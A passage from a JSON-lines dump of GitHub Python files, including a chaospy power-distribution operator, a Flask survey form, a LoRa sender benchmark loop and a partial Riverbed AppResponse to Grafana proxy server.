field_dict[\"categories\"] = categories\n if metadata is not UNSET:\n field_dict[\"metadata\"] = metadata\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n from ..models.annotated_doc_category import AnnotatedDocCategory\n from ..models.annotated_doc_sentence_metadata import AnnotatedDocSentenceMetadata\n\n d = src_dict.copy()\n end = d.pop(\"end\")\n\n start = d.pop(\"start\")\n\n categories = []\n _categories = d.pop(\"categories\", UNSET)\n for categories_item_data in _categories or []:\n categories_item = AnnotatedDocCategory.from_dict(categories_item_data)\n\n categories.append(categories_item)\n\n _metadata = d.pop(\"metadata\", UNSET)\n metadata: Union[Unset, AnnotatedDocSentenceMetadata]\n if isinstance(_metadata, Unset):\n metadata = UNSET\n else:\n metadata = AnnotatedDocSentenceMetadata.from_dict(_metadata)\n\n annotated_doc_sentence = cls(\n end=end,\n start=start,\n categories=categories,\n metadata=metadata,\n )\n\n return annotated_doc_sentence\n","repo_name":"kairntech/sherpa-client","sub_path":"sherpa_client/models/annotated_doc_sentence.py","file_name":"annotated_doc_sentence.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"22937114669","text":"\"\"\"Power operator.\"\"\"\nimport numpy\nimport chaospy\n\nfrom ..baseclass import Distribution, OperatorDistribution\n\n\nclass 
Power(OperatorDistribution):\n \"\"\"Power operator.\"\"\"\n\n _operator = lambda self, left, right: left**right\n\n def __init__(self, left, right):\n \"\"\"\n Constructor.\n\n Args:\n left (Distribution, numpy.ndarray) : Left hand side.\n right (Distribution, numpy.ndarray) : Right hand side.\n \"\"\"\n super(Power, self).__init__(\n left=left,\n right=right,\n repr_args=[left, right],\n )\n\n def _lower(self, idx, left, right, cache):\n \"\"\"\n Distribution lower bounds.\n\n Example:\n >>> chaospy.Uniform().lower\n array([0.])\n >>> chaospy.Power(chaospy.Uniform(), 2).lower\n array([0.])\n >>> chaospy.Power(chaospy.Uniform(1, 2), -1).lower\n array([0.5])\n >>> chaospy.Power(2, chaospy.Uniform()).lower\n array([1.])\n >>> chaospy.Power(2, chaospy.Uniform(-1, 0)).lower\n array([0.5])\n\n \"\"\"\n left = self._parameters[\"left\"]\n right = self._parameters[\"right\"]\n\n if isinstance(left, Distribution):\n left_upper = left._get_upper(idx, cache=self._upper_cache)\n left_lower = left._get_lower(idx, cache=self._lower_cache)\n\n if isinstance(right, Distribution):\n right_upper = right._get_upper(idx, cache=self._upper_cache)\n right_lower = right._get_lower(idx, cache=self._lower_cache)\n\n out = numpy.min(\n numpy.broadcast_arrays(\n left_lower.T**right_lower.T,\n left_lower.T**right_upper.T,\n left_upper.T**right_lower.T,\n left_upper.T**right_upper.T,\n ),\n axis=0,\n ).T\n\n else:\n # assert 0, (idx, left_lower, left_upper, right)\n out = numpy.min(\n [left_lower ** right[idx], left_upper ** right[idx]], axis=0\n ).T\n\n else:\n assert isinstance(right, Distribution)\n right_upper = right._get_upper(idx, cache=self._upper_cache)\n right_lower = right._get_lower(idx, cache=self._lower_cache)\n out = numpy.min(\n [left[idx] ** right_lower, left[idx] ** right_upper], axis=0\n ).T\n\n return out\n\n def _upper(self, idx, left, right, cache):\n \"\"\"\n Distribution bounds.\n\n Example:\n >>> chaospy.Uniform().upper\n array([1.])\n >>> chaospy.Power(chaospy.Uniform(), 2).upper\n array([1.])\n >>> chaospy.Power(chaospy.Uniform(1, 2), -1).upper\n array([1.])\n >>> chaospy.Power(2, chaospy.Uniform()).upper\n array([2.])\n >>> chaospy.Power(2, chaospy.Uniform(-1, 0)).upper\n array([1.])\n\n \"\"\"\n left = self._parameters[\"left\"]\n right = self._parameters[\"right\"]\n if isinstance(left, Distribution):\n left_lower = left._get_lower(idx, cache=self._lower_cache)\n left_upper = left._get_upper(idx, cache=self._upper_cache)\n\n if isinstance(right, Distribution):\n right_lower = right._get_lower(idx, cache=self._lower_cache)\n right_upper = right._get_upper(idx, cache=self._upper_cache)\n\n out = numpy.max(\n numpy.broadcast_arrays(\n (left_lower.T**right_lower.T).T,\n (left_lower.T**right_upper.T).T,\n (left_upper.T**right_lower.T).T,\n (left_upper.T**right_upper.T).T,\n ),\n axis=0,\n )\n\n else:\n out = numpy.max(\n [left_lower ** right[idx], left_upper ** right[idx]], axis=0\n )\n\n else:\n assert isinstance(right, Distribution)\n right_lower = right._get_lower(idx, cache=self._lower_cache)\n right_upper = right._get_upper(idx, cache=self._upper_cache)\n out = numpy.max(\n [left[idx] ** right_lower, left[idx] ** right_upper], axis=0\n )\n\n return out\n\n def _pdf(self, xloc, idx, left, right, cache):\n \"\"\"\n Probability density function.\n\n Example:\n >>> chaospy.Uniform().pdf([-0.5, 0.5, 1.5, 2.5])\n array([0., 1., 0., 0.])\n >>> chaospy.Power(chaospy.Uniform(), 2).pdf([-0.5, 0.5, 1.5, 2.5])\n array([0. , 0.70710678, 0. , 0. 
])\n >>> chaospy.Power(chaospy.Uniform(1, 2), -1).pdf([0.4, 0.6, 0.8, 1.2])\n array([0. , 2.77777778, 1.5625 , 0. ])\n >>> chaospy.Power(2, chaospy.Uniform()).pdf([-0.5, 0.5, 1.5, 2.5])\n array([0. , 0. , 0.96179669, 0. ])\n >>> chaospy.Power(2, chaospy.Uniform(-1, 0)).pdf([0.4, 0.6, 0.8, 1.2])\n array([0. , 2.40449173, 1.8033688 , 0. ])\n\n \"\"\"\n if isinstance(left, Distribution):\n x_ = numpy.sign(xloc) * numpy.abs(xloc) ** (1.0 / right - 1)\n xloc = numpy.sign(xloc) * numpy.abs(xloc) ** (1.0 / right)\n pairs = numpy.sign(xloc**right) == 1\n out = left._get_pdf(xloc, idx, cache=cache.copy())\n if numpy.any(pairs):\n out = out + pairs * left._get_pdf(-xloc, idx, cache=cache)\n out = numpy.sign(right) * out * x_ / right\n out[numpy.isnan(out)] = numpy.inf\n\n else:\n assert numpy.all(left > 0), \"imaginary result\"\n x_ = numpy.where(\n xloc <= 0,\n -numpy.inf,\n numpy.log(xloc + 1.0 * (xloc <= 0))\n / numpy.log(left + 1.0 * (left == 1)),\n )\n num_ = numpy.log(left + 1.0 * (left == 1)) * xloc\n num_ = num_ + 1.0 * (num_ == 0)\n out = right._get_pdf(x_, idx, cache=cache) / num_\n\n return out\n\n def _cdf(self, xloc, idx, left, right, cache):\n \"\"\"\n Cumulative distribution function.\n\n Example:\n >>> chaospy.Uniform().fwd([-0.5, 0.5, 1.5, 2.5])\n array([0. , 0.5, 1. , 1. ])\n >>> chaospy.Power(chaospy.Uniform(), 2).fwd([-0.5, 0.5, 1.5, 2.5])\n array([0. , 0.70710678, 1. , 1. ])\n >>> chaospy.Power(chaospy.Uniform(1, 2), -1).fwd([0.4, 0.6, 0.8, 1.2])\n array([0. , 0.33333333, 0.75 , 1. ])\n >>> chaospy.Power(2, chaospy.Uniform()).fwd([-0.5, 0.5, 1.5, 2.5])\n array([0. , 0. , 0.5849625, 1. ])\n >>> chaospy.Power(2, chaospy.Uniform(-1, 0)).fwd([0.4, 0.6, 0.8, 1.2])\n array([0. , 0.26303441, 0.67807191, 1. ])\n\n \"\"\"\n if isinstance(left, Distribution):\n y = numpy.sign(xloc) * numpy.abs(xloc) ** (1.0 / right)\n pairs = numpy.sign(xloc**right) != -1\n out2 = left._get_fwd(-y, idx, cache=cache.copy())\n out1 = left._get_fwd(y, idx, cache=cache)\n out = numpy.where(right < 0, 1 - out1, out1 - pairs * out2)\n else:\n y = numpy.log(numpy.abs(xloc) + 1.0 * (xloc <= 0)) / numpy.log(\n numpy.abs(left) + 1.0 * (left == 1)\n )\n out = right._get_fwd(y, idx, cache=cache)\n out = numpy.where(xloc <= 0, 0.0, out)\n return out\n\n def _ppf(self, q, idx, left, right, cache):\n \"\"\"\n Point percentile function.\n\n Example:\n >>> chaospy.Uniform().inv([0.1, 0.2, 0.9])\n array([0.1, 0.2, 0.9])\n >>> chaospy.Power(chaospy.Uniform(), 2).inv([0.1, 0.2, 0.9])\n array([0.01, 0.04, 0.81])\n >>> chaospy.Power(chaospy.Uniform(1, 2), -1).inv([0.1, 0.2, 0.9])\n array([0.52631579, 0.55555556, 0.90909091])\n >>> chaospy.Power(2, chaospy.Uniform()).inv([0.1, 0.2, 0.9])\n array([1.07177346, 1.14869835, 1.86606598])\n >>> chaospy.Power(2, chaospy.Uniform(-1, 0)).inv([0.1, 0.2, 0.9])\n array([0.53588673, 0.57434918, 0.93303299])\n\n \"\"\"\n if isinstance(left, Distribution):\n q = numpy.where(right.T < 0, 1 - q.T, q.T).T\n out = (left._get_inv(q, idx, cache=cache).T ** right.T).T\n else:\n out = right._get_inv(q, idx, cache=cache)\n out = numpy.where(left < 0, 1 - out, out)\n out = (left.T**out.T).T\n return out\n\n def _mom(self, k, left, right, cache):\n \"\"\"\n Statistical moments.\n\n Example:\n >>> numpy.around(chaospy.Uniform().mom([0, 1, 2, 3]), 4)\n array([1. , 0.5 , 0.3333, 0.25 ])\n >>> numpy.around(chaospy.Power(chaospy.Uniform(), 2).mom([0, 1, 2, 3]), 4)\n array([1. , 0.3333, 0.2 , 0.1429])\n >>> numpy.around(chaospy.Power(chaospy.Uniform(1, 2), -1).mom([0, 1, 2, 3]), 4)\n array([1. 
, 0.6931, 0.5   , 0.375 ])\n            >>> numpy.around(chaospy.Power(2, chaospy.Uniform()).mom([0, 1, 2, 3]), 4)\n            array([1.    , 1.4427, 2.164 , 3.3663])\n            >>> numpy.around(chaospy.Power(2, chaospy.Uniform(-1, 0)).mom([0, 1, 2, 3]), 4)\n            array([1.    , 0.7213, 0.541 , 0.4208])\n\n        \"\"\"\n        del cache\n        if isinstance(right, Distribution):\n            raise chaospy.UnsupportedFeature(\"distribution as exponent not supported.\")\n        if numpy.any(right < 0):\n            raise chaospy.UnsupportedFeature(\n                \"distribution to negative power not supported.\"\n            )\n        if not numpy.allclose(right, numpy.array(right, dtype=int)):\n            raise chaospy.UnsupportedFeature(\n                \"distribution to fractional power not supported.\"\n            )\n        return left._get_mom(k * right)\n","repo_name":"jonathf/chaospy","sub_path":"chaospy/distributions/operators/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":10072,"program_lang":"python","lang":"en","doc_type":"code","stars":417,"dataset":"github-code","pt":"47"}
{"seq_id":"26609925089","text":"import datetime\n\nfrom google.appengine.api import users\n\nfrom nomic.db import User\n\nrefresh_delta = datetime.timedelta(hours=1)\n\ndef _user(self):\n    is_admin = users.is_current_user_admin()\n    guser = users.get_current_user()\n    if guser:\n        user = User.get_by_key_name(guser.user_id())\n        if user is None:\n            user = User(key_name=guser.user_id())\n            user.user = guser\n            user.last_login = datetime.datetime.now()\n            user.put()\n        if datetime.datetime.now() - user.last_login >= refresh_delta:\n            user.last_login = datetime.datetime.now()\n            user.put()\n        url = users.create_logout_url(self.request.uri)\n    else:\n        user = None\n        url = users.create_login_url(self.request.uri)\n    return user, is_admin, url\n\ndef send_error(handler, msg, *args, **kwargs):\n    handler.response.set_status(kwargs.get('status', 500))\n    msg = msg % args\n    handler.response.out.write(handler.env.get_template('error.html').render(locals()))\n","repo_name":"coderanger/pynomic","sub_path":"nomic/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"47"}
{"seq_id":"70360365262","text":"from flask import Flask, flash, redirect, render_template, request\napp = Flask(__name__)\napp.secret_key = 'keep it secret, keep it safe'\n@app.route('/')\ndef index():\n    return render_template(\"index.html\")\n\n\n@app.route('/result', methods=[\"POST\"])\ndef result():\n    is_valid = True\n    if len(request.form['comment']) > 120:\n        flash(\"Comment cannot be more than 120 characters.\")\n        is_valid = False\n    if not request.form['name']:\n        flash(\"Name is required!\")\n        is_valid = False\n    if not is_valid:\n        # validation failed: go back to the form so the flashed messages are shown\n        return redirect(\"/\")\n    name = request.form['name']\n    location = request.form['location']\n    language = request.form['language']\n    comment = request.form['comment']\n    return render_template('result.html', name=name, location=location, language=language, comment=comment)\n\n\napp.run(debug = True)","repo_name":"Colbyjoe97/CodingDojo","sub_path":"Python(2021)/Flask/Dojo_Survey_With_Validation/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"32017516415","text":"import os\r\nimport json\r\nfrom time import time\r\nfrom collections import defaultdict\r\nfrom itertools import product\r\n\r\n\r\n# always use an auto-nesting dict; previous results (if any) are merged in below\r\nnested_dict = lambda: defaultdict(nested_dict)\r\nrate_dict = 
nested_dict()\r\ntry:\r\n    with open('rate_dict.json', 'r') as f:\r\n        # JSON object keys are strings, so cast them back to ints to match the indexing below\r\n        for w, by_sender in json.load(f).items():\r\n            for s, by_receiver in by_sender.items():\r\n                for r, rate in by_receiver.items():\r\n                    rate_dict[int(w)][int(s)][int(r)] = rate\r\nexcept FileNotFoundError:\r\n    pass\r\n\r\nfile_size = 12.8 # Kb\r\nsender_timeout_vals = range(3, 10 + 1)\r\nwindow_size_vals = range(1, 10 + 1)\r\nreceiver_timeout = 4\r\n\r\n\r\nfor sender_timeout, window_size in product(sender_timeout_vals, window_size_vals):\r\n    # run sender with params\r\n    start_time = time()\r\n    os.system(f\"python sender_gbn.py {window_size} {sender_timeout}\")\r\n    end_time = time()\r\n    data_rate = round(file_size/(end_time-start_time), 10)\r\n    print(f\"Window Size: {window_size}, Sender Timeout: {sender_timeout}, Receiver Timeout: {receiver_timeout} ----> Data Rate: {data_rate} Kbps\")\r\n    rate_dict[window_size][sender_timeout][receiver_timeout] = data_rate\r\n\r\nwith open('rate_dict.json', 'w') as f:\r\n    json.dump(rate_dict, f)","repo_name":"gadm21/DORA","sub_path":"services/lora_test_service/sender_loop.py","file_name":"sender_loop.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"2282573750","text":"import requests\nimport json\nimport time\nimport string\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import request\nfrom calendar import timegm\nfrom datetime import datetime\n# Lines containing critical information : 17 18 19 + very last line (port)\n#########################################################################################################################\n##                                                                                                                     ##\n##                                                 Initializing server                                                 ##\n##                                                                                                                     ##\n#########################################################################################################################\n# Riverbed AppResponse probe's address and credentials\nHOST = \"\"\nUSERNAME = \"\"\nPASSWORD = \"\"\nuserCredentials = {\n    \"user_credentials\":\n    {\n        \"username\":USERNAME, \"password\":PASSWORD\n    },\n    \"generate_refresh_token\": False\n}\n# Creating an instance of Flask (i.e. the app)\nserverFlask = Flask(__name__)\n# Session is used for SSL overriding\nsession = requests.Session()\n# Variables for buffering all lists returned to Grafana (refreshed if 120s elapsed) except FamilyPageList\nlastTimeHostGroupListHasBeenPicked = 0\nhostGroupsList = []\nlastTimeApplicationsListHasBeenPicked = 0\napplicationsList = []\nlastTimeWebAppsListHasBeenPicked = 0\nwebAppsList = []\nlastTimemetricsHostGroupListHasBeenPicked = 0\nmetricsHostGroupList = []\nlastTimeMetricsApplicationListHasBeenPicked = 0\nmetricsApplicationList = []\nlastTimeMetricsWebAppListHasBeenPicked = 0\nmetricsWebAppList = []\n# Variable for Pagefamilies query\nglobalAllRowSourceIDs = [0]*26\n\n\n#########################################################################################################################\n##                                                                                                                     ##\n##                                                FUNCTIONS DECLARATION                                                ##\n##                                                                                                                     ##\n#########################################################################################################################\n# Authentication function\n# Argument credentials = object with credentials\ndef tryAuthentication(credentials):\n    # Converting credentials to JSON format\n    dataLogsJSON = json.dumps(credentials)\n    # URL to connect to the API's authentication system\n    urlLogin = 'https://'+HOST+'/api/mgmt.aaa/1.0/token'\n    # Sending the request for authentication (without SSL certificate check)\n    r = session.post(urlLogin, dataLogsJSON, verify=False)\n    return r\n\n\n# Refresh token function\n# Argument credentials = object with credentials\ndef getNewToken(credentials):\n    reponse = tryAuthentication(credentials)\n    dictionnaire = reponse.json()\n    # Extract the token\n    token = dictionnaire['access_token']\n    return token\n\n\n# POST 
request function (creation of instances, e.g. reports)\n# Argument credentials = object with credentials\n# Argument dataDefJSON = data definitions in JSON format (= metric query)\ndef createSyncInstance(credentials, dataDefJSON):\n    global currentToken\n    # URL to connect to the API's report creation system\n    urlPOSTsync = 'https://'+HOST+'/api/npm.reports/1.0/instances/sync'\n    # Adding the token to the headers for Riverbed access\n    headers = {\"Authorization\": \"Bearer \"+ currentToken}\n    response = session.post(urlPOSTsync, dataDefJSON, headers=headers, verify=False)\n    # If the token is expired, get a brand new token\n    if response.status_code == 401:\n        currentToken = getNewToken(credentials)\n        headers = {\"Authorization\": \"Bearer \"+ currentToken}\n        response = session.post(urlPOSTsync, dataDefJSON, headers=headers, verify=False)\n    return response\n\n\n# GET request function (collect information through the API: hostgroups, applications, webapps...)\n# Argument credentials = object with credentials\n# Argument url = API's url\ndef retrieveInformationFromAPI(credentials, url):\n    global currentToken\n    # Adding the token to the headers for Riverbed access\n    headers = {\"Authorization\": \"Bearer \"+ currentToken}\n    # Querying Riverbed AppResponse\n    response = session.get(url, headers=headers, verify=False)\n    # If the token is expired, get a brand new token\n    if response.status_code == 401:\n        currentToken = getNewToken(credentials)\n        headers = {\"Authorization\": \"Bearer \"+ currentToken}\n        response = session.get(url, headers=headers, verify=False)\n    # Returning the server's response, containing all data returned by the API\n    return response\n\n\n# Convert a timestamp to epoch format (seconds elapsed since 1970)\ndef convert_to_epoch(timestamp):\n    return timegm(datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%S.%fZ').timetuple())\n\n\n# Get the very first token (server initialization)\ncurrentToken = getNewToken(userCredentials)\n\n#########################################################################################################################\n##                                                                                                                     ##\n##                                                     HEALTH TEST                                                     ##\n##                                                                                                                     ##\n#########################################################################################################################\n# Response when adding a new datasource in Grafana; must return a 200 http_code to be accepted\n@serverFlask.route(\"/\", methods = ['GET'])\ndef healthTest():\n    return \"OK\"\n\n\n#########################################################################################################################\n##                                                                                                                     ##\n##                                             HOST_GROUPS LIST RETRIEVING                                             ##\n##                                                                                                                     ##\n#########################################################################################################################\n@serverFlask.route(\"/getHost_group\", methods = ['POST'])\ndef getHost_group():\n    global lastTimeHostGroupListHasBeenPicked\n    global hostGroupsList\n    # If it has been less than 120 seconds since the last creation of the hostGroupsList, no query is made to Riverbed's API\n    timeIsHostGroupsListOutdated = round((time.time() - lastTimeHostGroupListHasBeenPicked),0)\n    if timeIsHostGroupsListOutdated < 120 :\n        return jsonify(hostGroupsList)\n    else :\n        global currentToken\n        # API for host_groups retrieving\n        urlGET = 'https://'+HOST+'/api/npm.classification/2.0/hostgroups'\n        # Retrieving hostgroups\n        response = retrieveInformationFromAPI(userCredentials, urlGET)\n        # Parse the response into a dict to easily access the listing part\n        dictionnaire = json.loads(response.text)\n        # Field 'items' contains all host groups (name and id)\n        valeurs = dictionnaire['items']\n        hostGroupsList= []\n        # For 
each host group, if enabled, add object{name, id} (angular will interpret it, the user clicks on a name but JS retrieves the id) \n        for value in valeurs:\n            if value[\"enabled\"] :\n                hostGroupsList.append({'text': value[\"name\"], 'value':str(value['id'])})\n        lastTimeHostGroupListHasBeenPicked = time.time()\n        return jsonify(hostGroupsList)\n\n\n#########################################################################################################################\n##                                                                                                                     ##\n##                                             APPLICATIONS LIST RETRIEVING                                            ##\n##                                                                                                                     ##\n#########################################################################################################################\n@serverFlask.route(\"/getApplicationOptions\", methods = ['POST'])\ndef getApplicationOptions():\n    global lastTimeApplicationsListHasBeenPicked\n    global applicationsList\n    # If it has been less than 120 seconds since the last creation of the applicationsList, no query is made to Riverbed's API\n    timeIsApplicationsListOutdated = round((time.time() - lastTimeApplicationsListHasBeenPicked),0)\n    if timeIsApplicationsListOutdated < 120 :\n        return jsonify(applicationsList)\n    else :\n        global currentToken\n        # API for applications retrieving\n        urlGET = 'https://'+HOST+'/api/npm.classification/2.0/applications'\n        # Retrieving applications\n        response = retrieveInformationFromAPI(userCredentials, urlGET)\n        # Parse the response into a dict to easily access the listing part\n        parsed = json.loads(response.text)\n        # Field 'items' contains all applications (name and id)\n        valeurs = parsed['items']\n        applicationsList= []\n        # For each application, if enabled, add object{name, id} (angular will interpret it, the user clicks on a name but JS retrieves the id)\n        for value in valeurs:\n            if value[\"enabled\"] :\n                applicationsList.append({'text': value[\"name\"], 'value':str(value['id'])})\n        lastTimeApplicationsListHasBeenPicked = time.time()\n        return jsonify(applicationsList)\n\n\n#########################################################################################################################\n##                                                                                                                     ##\n##                                               WEBAPPS LIST RETRIEVING                                               ##\n##                                                                                                                     ##\n#########################################################################################################################\n@serverFlask.route(\"/getWebAppOptions\", methods = ['POST'])\ndef getWebAppOptions():\n    global lastTimeWebAppsListHasBeenPicked\n    global webAppsList\n    # If it has been less than 120 seconds since the last creation of the webAppsList, no query is made to Riverbed's API\n    timeIsWebAppsListOutdated = round((time.time() - lastTimeWebAppsListHasBeenPicked),0)\n    if timeIsWebAppsListOutdated < 120 :\n        return jsonify(webAppsList)\n    else :\n        global currentToken\n        # API for WebApps retrieving\n        urlGET = 'https://'+HOST+'/api/npm.wta_config/1.0/wta_webapps'\n        # Retrieving WebApps\n        response = retrieveInformationFromAPI(userCredentials, urlGET)\n        # Parse the response into a dict to easily access the listing part\n        parsed = json.loads(response.text)\n        # Field 'items' contains all WebApps (name and id)\n        valeurs = parsed['items']\n        webAppsList= []\n        # For each WebApp, add object{name, id} (angular will interpret it, the user clicks on a name but JS retrieves the id)\n        for value in valeurs:\n            webAppsList.append({'text': value[\"name\"], 'value':str(value['id'])})\n        lastTimeWebAppsListHasBeenPicked = time.time()\n        return jsonify(webAppsList)\n\n\n#########################################################################################################################\n##                                                                                                                     ##\n##                                               METRICS LIST RETRIEVING                                               ##\n##                                                                                                                     
##\n#########################################################################################################################\n# Metrics for hostgroups\n@serverFlask.route(\"/metricsHG\", methods = ['POST'])\ndef metricsHG():\n    global lastTimemetricsHostGroupListHasBeenPicked\n    global metricsHostGroupList\n    # If it has been less than 120 seconds since the last creation of the metricsHostGroupList, no query is made to Riverbed's API\n    timeIsMetricsHostGroupListOutdated = round((time.time() - lastTimemetricsHostGroupListHasBeenPicked),0)\n    if timeIsMetricsHostGroupListOutdated < 120 :\n        return jsonify(metricsHostGroupList)\n    else :\n        global currentToken\n        # API for aggregate metrics retrieving\n        urlGET = 'https://'+HOST+'/api/npm.reports.sources/1.0/sources/items/aggregates'\n        # Retrieving metrics for the aggregate source type\n        response = retrieveInformationFromAPI(userCredentials, urlGET)\n        # Parse the response into a dict to easily access the listing part\n        parsed = json.loads(response.text)\n        # Field 'columns' contains the metrics\n        valeurs = parsed['columns']\n        metricsHostGroupList= []\n        # Push metrics into the array, excluding non-computable columns and RTP metrics (not relevant)\n        for value in valeurs:\n            if not value[\"id\"].endswith('.id') and not value[\"id\"].endswith('_id') and \\\n               not value[\"id\"].endswith('.name') and not value[\"id\"].endswith('_name') and \\\n               not value[\"id\"].endswith('.ip') and not value[\"id\"].endswith('_ip') and \\\n               not value[\"id\"].endswith('.dns') and not value[\"id\"].endswith('_dns') and \\\n               not value[\"id\"].endswith('.type') and not value[\"id\"].endswith('_type') and \\\n               not value[\"id\"].endswith('start_time') and not value[\"id\"].endswith('end_time') and \\\n               not \"rtp\" in value[\"id\"]:\n                # If the metric has no unit then display 'occurrence' instead of 'none'\n                if value[\"unit\"]=='none':\n                    unit = 'occurrence'\n                else :\n                    unit = value[\"unit\"]\n                # If a rate is available, display unit/rate\n                try:\n                    # For each metric, add object{label (unit/rate), id} (angular will interpret it, the user clicks on a name but JS retrieves the id)\n                    metricsHostGroupList.append({'text': value[\"label\"]+\" (\"+unit+\"/\"+value[\"rate\"]+\")\", 'value':value['id']})\n                # Else just display the unit\n                except KeyError as e:\n                    # or add object{label (unit), id} if rate is not applicable (angular will interpret it, the user clicks on a name but JS retrieves the id)\n                    metricsHostGroupList.append({'text': value[\"label\"]+\" (\"+unit+\")\", 'value':value['id']})\n            # only id displayed : \n            # metricsHostGroupList.append([value[\"id\"], value['unit']])\n        lastTimemetricsHostGroupListHasBeenPicked = time.time()\n        return jsonify(metricsHostGroupList)\n\n\n# Metrics for application\n@serverFlask.route(\"/metricsApplication\", methods = ['POST'])\ndef metricsApplications():\n    global lastTimeMetricsApplicationListHasBeenPicked\n    global metricsApplicationList\n    # If it has been less than 120 seconds since the last creation of the metricsApplicationList, no query is made to Riverbed's API\n    timeIsMetricsApplicationListOutdated = round((time.time() - lastTimeMetricsApplicationListHasBeenPicked),0)\n    if timeIsMetricsApplicationListOutdated < 120 :\n        return jsonify(metricsApplicationList)\n    else :\n        global currentToken\n        # API for aggregate metrics retrieving\n        urlGET = 'https://'+HOST+'/api/npm.reports.sources/1.0/sources/items/aggregates'\n        # Retrieving metrics for aggregate\n        response = retrieveInformationFromAPI(userCredentials, urlGET)\n        # Parse the response into a dict to easily access the listing part\n        parsed = json.loads(response.text)\n        # Field 
'columns' contains the metrics\n        valeurs = parsed['columns']\n        metricsApplicationList= []\n        # Push metrics into the array, excluding non-computable columns and RTP/web metrics (not relevant)\n        for value in valeurs:\n            if not value[\"id\"].endswith('.id') and not value[\"id\"].endswith('_id') and \\\n                not value[\"id\"].endswith('.name') and not value[\"id\"].endswith('_name') and \\\n                not value[\"id\"].endswith('.ip') and not value[\"id\"].endswith('_ip') and \\\n                not value[\"id\"].endswith('.dns') and not value[\"id\"].endswith('_dns') and \\\n                not value[\"id\"].endswith('.type') and not value[\"id\"].endswith('_type') and \\\n                not value[\"id\"].endswith('start_time') and not value[\"id\"].endswith('end_time') and \\\n                not \"rtp\" in value[\"id\"] and not \"web\" in value[\"id\"] and \\\n                not \"p2m\" in value[\"id\"] and not \"m2p\" in value[\"id\"] : \n                # If the metric has no unit then display 'occurrence' instead of 'none'\n                if value[\"unit\"]=='none':\n                    unit = 'occurrence'\n                else :\n                    unit = value[\"unit\"]\n                # If a rate is available, display unit/rate\n                try:\n                    # For each metric, add object{label (unit/rate), id} (angular will interpret it, the user clicks on a name but JS retrieves the id)\n                    metricsApplicationList.append({'text': value[\"label\"]+\" (\"+unit+\"/\"+value[\"rate\"]+\")\", 'value':value['id']})\n                # Else just display the unit\n                except KeyError as e:\n                    # or add object{label (unit), id} if rate is not applicable (angular will interpret it, the user clicks on a name but JS retrieves the id)\n                    metricsApplicationList.append({'text': value[\"label\"]+\" (\"+unit+\")\", 'value':value['id']})\n        lastTimeMetricsApplicationListHasBeenPicked = time.time()\n        return jsonify(metricsApplicationList)\n\n\n# Metrics for WebApps\n@serverFlask.route(\"/metricsWebApp\", methods = ['POST'])\ndef metricsWebbApp():\n    global lastTimeMetricsWebAppListHasBeenPicked\n    global metricsWebAppList\n    # If it has been less than 120 seconds since the last creation of the metricsWebAppList, no query is made to Riverbed's API\n    timeIsMetricsWebAppListOutdated = round((time.time() - lastTimeMetricsWebAppListHasBeenPicked),0)\n    if timeIsMetricsWebAppListOutdated < 120 :\n        return jsonify(metricsWebAppList)\n    else :\n        \n        global currentToken\n        # API for aggregate metrics retrieving\n        urlGET = 'https://'+HOST+'/api/npm.reports.sources/1.0/sources/items/aggregates'\n        # Retrieving metrics for aggregates\n        response = retrieveInformationFromAPI(userCredentials, urlGET)\n        # Parse the response into a dict to easily access the listing part\n        parsed = json.loads(response.text)\n        # Field 'columns' contains the metrics\n        valeurs = parsed['columns']\n        metricsWebAppList= []\n        # Push metrics into the array, excluding non-computable columns\n        print(\"Adding the Riverbed values to a JSON\")\n        for value in valeurs:\n            if not value[\"id\"].endswith('.id') and not value[\"id\"].endswith('_id') and \\\n                not value[\"id\"].endswith('.name') and not value[\"id\"].endswith('_name') and \\\n                not value[\"id\"].endswith('.ip') and not value[\"id\"].endswith('_ip') and \\\n                not value[\"id\"].endswith('.dns') and not value[\"id\"].endswith('_dns') and \\\n                not value[\"id\"].endswith('.type') and not value[\"id\"].endswith('_type') and \\\n                not value[\"id\"].endswith('start_time') and not value[\"id\"].endswith('end_time') and \\\n                \"web\" in value[\"id\"] :\n                # If the metric has no unit then display 'occurrence' instead of 'none'\n                if value[\"unit\"]=='none':\n                    unit = 'occurrence'\n                else :\n                    unit = value[\"unit\"]\n                # If a rate is available, display unit/rate\n                try:\n                    # For each metric, add object{label (unit/rate), 
id} (angular will interpret it, user click on name but JS retrieves id)\n metricsWebAppList.append({'text': value[\"label\"]+\" (\"+unit+\"/\"+value[\"rate\"]+\")\", 'value':value['id']})\n # Else just display unit\n except KeyError as e:\n # or add object{label (unit), id} if rate is not applicable (angular will interpret it, user click on name but JS retrieves id)\n metricsWebAppList.append({'text': value[\"label\"]+\" (\"+unit+\")\", 'value':value['id']})\n lastTimeMetricsWebAppListHasBeenPicked = time.time()\n return jsonify(metricsWebAppList)\n\n\n#########################################################################################################################\n## ##\n## FAMILY PAGES LIST RETRIEVING ##\n## ##\n#########################################################################################################################\n# Cannot get page.family.id from API, getting all pages requested for 24 hours (large granularity for light query)\n@serverFlask.route(\"/getPageFamilyOptions\", methods = ['POST'])\ndef getPageFamilyOptions():\n # This global variable is set when picking a source in /query\n global globalAllRowSourceIDs\n # Retrieving JSON from Grafana in order to extract row letter (and number)\n grafanaData = request.get_json()\n # Letter from Grafana's row (converted to integer, alphabetical position)\n currentRowLetter = grafanaData['target'].lower()\n currentRowNumber = string.lowercase.index(grafanaData['target'].lower())\n sourceID = globalAllRowSourceIDs[currentRowNumber]\n if sourceID == 0:\n return \"0\"\n\n dataDefs = {'data_defs': [\n {\n \"source\": {\n \"origin\": \"\",\n \"path\": 'aggregates:App',\n \"type\": \"\",\n \"name\": \"aggregates\"\n },\n \"time\": {\n \"duration\": \"last 24 hours\",\n \"granularity\": \"86400\",\n },\n \"group_by\": [\n \"start_time\",\n \"app.id\"\n 